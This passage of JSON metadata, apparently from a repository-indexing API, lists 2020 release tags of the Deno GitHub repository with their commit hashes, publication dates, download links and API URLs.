9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-0